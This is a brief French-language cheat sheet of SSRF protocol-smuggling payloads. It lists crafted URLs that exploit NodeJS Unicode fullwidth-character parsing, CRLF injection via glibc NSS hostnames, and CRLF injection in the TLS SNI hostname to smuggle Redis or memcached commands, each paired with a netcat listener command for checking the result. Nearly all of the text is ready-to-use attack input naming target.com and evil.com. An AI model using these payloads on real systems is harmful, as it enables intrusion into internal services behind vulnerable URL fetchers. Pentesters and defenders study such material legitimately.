Protocol Smuggling

NodeJS

URL

http://target.com:6379/－＊test@evil.com@6379－＊

Unicode failure via les caractères U+FF0D et U+FF0A

Vérification

$ nc -vvlp 6379

GLibc NSS

URL

http://target.com\r\ntest evil.com 6379\r\n:6379/
http://target.com\r\n test evil.com 6379\r\n :6379/

Le protocole HTTP 1.1 a besoin d'un host header

Vérification

$ nc -vvlp 6379

SNI injection - embeded hostname in SSL client Hello

URL

https://target.com\r\nSET foo 0 60 5\r\n:443/

Vérification

$ nc -vvlp 443